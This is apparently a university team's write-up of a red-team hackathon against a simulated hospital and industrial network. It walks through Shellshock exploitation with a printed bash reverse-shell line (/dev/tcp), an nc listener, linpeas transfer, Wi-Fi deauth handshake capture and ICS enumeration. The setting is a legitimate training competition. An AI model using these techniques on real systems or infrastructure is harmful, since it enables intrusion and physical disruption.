π’Hack The Building 2.0 Preliminary : Hospital Edition 2023
Our experience participating in the Hack The Building 2.0 Hospital Edition Preliminary.
Preliminary event force-on-force style hackathon(Blue vs. Red Team) against other Universities and whoever was within the top of the leaderboard earned a spot to attend the in person event. Our small team of about 3-4 participated as a red team in this event. Being our first time participating in such a competition we did not qualify for the in person event , but this was really fun !
Initial Foothold / Prepositioning
Scanning and Enumeration
We connected to the network using an openvpn file and started off with an initial nmap scan scanning for any open web ports within the network.
We did find some hosts, but most of it was "garbage" and not useful, so we copied and pasted the nmap output into a txt file "garbage" and then sorted through the output, removing anything unecessary.
Vulnerability Assessment
After filtering though the Nmap output, we did find that
was running apache on port 80. After going to we see that the page says "What a shockingly boring page", could this be a hint at a Shellshock vulnerability???
We tried using this Nmap script to verify if the vulnerability existed on the web app, and it does exist!
Shellshock Exploitation
1. Generate a Reverse Shell
Generate a revshell at https://revshells.com
Attacker IP:
Port: 5555
Listener type: nc -lvnp 5555
set advanced to on
Reverse, Bash -i
/bin/bash -i >& /dev/tcp/ 0>&1
shell: /bin/bash
encoding: none
2. Setup a nc listener to catch the revshell
3. Inspect > Network(to modify the User-Agent HTTP Request header)
Edit the
http request header
Send a New Request with the modified User-Agent header and view the Response
4. Profit $$$
Privilege Escalation
We got a low privileged user shell, now we can perform some local enumeration and see what can be exploited to escalate our privileges to root.
In this case we used linpeas to see if we can find any privilege escalation vectors.
Transfer to the target by hosting it on a python web server, and using curl on the compromised machine to download it.
Here we have some interesting Linpeas output.
It looks like we have a writable folder /run/shm, but here we tried running a kernel exploit instead.
We tried compiling the kernel exploit on our attack host and then transferring it to the compromised machine using the same method we used to transfer linpeas. Unfortunately, the kernel exploit did not work.
This being the second to last day of the preliminary we decided to take a breather and try again tomorrow , the last day...
Wi-Fi Exploitation
The next day, it was announced that for the teams that were unable to establish persistence, they were automatically given a jump host(as root) to speed things up a bit.
So with our already dedicated jump host, the next step was to perform Wi-Fi operations and try to exploit any of the Wi-Fi networks that were physically near the jumphost/compromised host.
Once we use ssh to access our jump host we can continue onto Wireless Compromise and Wireless sniffing.
When trying to compromise Wireless networks here is a list of some things we might want to consider when monitoring Wireless networks:
BSSID = MAC address of the Access Point (AP)
CH = channel 1-14 (1,6, and 11 are big ones)
PWR = power level (closer to 0 = closer to device)
Beacons (data, 0 = not connected to the internet)
ENC (e.g. WPA2)
AUTH (e.g. PSK)
ESSID = network name, length:21 could be a hidden network
Here, given the instructions from the white team, we had to choose one of the networks we wanted to wirelessly deauth to capture its WPA handshake, which we would then attempt to crack offline to ultimately gain access to the Wi-Fi network.
Once the WPA handshake was captured, we only had to show a proof of concept and not actually try to crack the password. Once proof was given, we were given the actual password to connect with and then we could begin to enumerate any active and vulnerable ICS systems connected to that Wi-Fi network.
Note: There were several Wi-Fi networks, which means each Wi-Fi network had different ICS systems connected to it.
ICS Enumeration & The End...
So far we have:
Successfully exploited a web server on to gain a foothold
Performed Wi-Fi exploitation from the foothold on any nearby Wi-Fi networks
Connect to the nearby Wi-Fi network
After successfully exploiting and connecting to the Wi-Fi network, we can go back to the enumeration phase and enumerate any host on that network, in this case any Industrial Control Systems(ICS) that we may be able to mess around with and accomplish any objectives that we have been assigned.
We were able to enumerate one of the ICS that we were tasked to mess around with and cause chaos(forgot to take screenshots of the nmap scans), but at this point we ran out of time and we were unable to exploit any of the ICS :(
Just to get an idea of what some of the challenges were like, they included:
Take control of systems controlling a lake, and then try to make the lake flood
Disable a power grid for a complete "lights out"
Disable sewage systems
Turn on a ferris wheel
Shutoff camera systems
Disable crane operations
Manipulate and disrupt a conveyor belt system
Overall, this competition was fun and a great learning experience, hopefully UNG can qualify for Hack The Building 3.0 whenever it is announced!
Last updated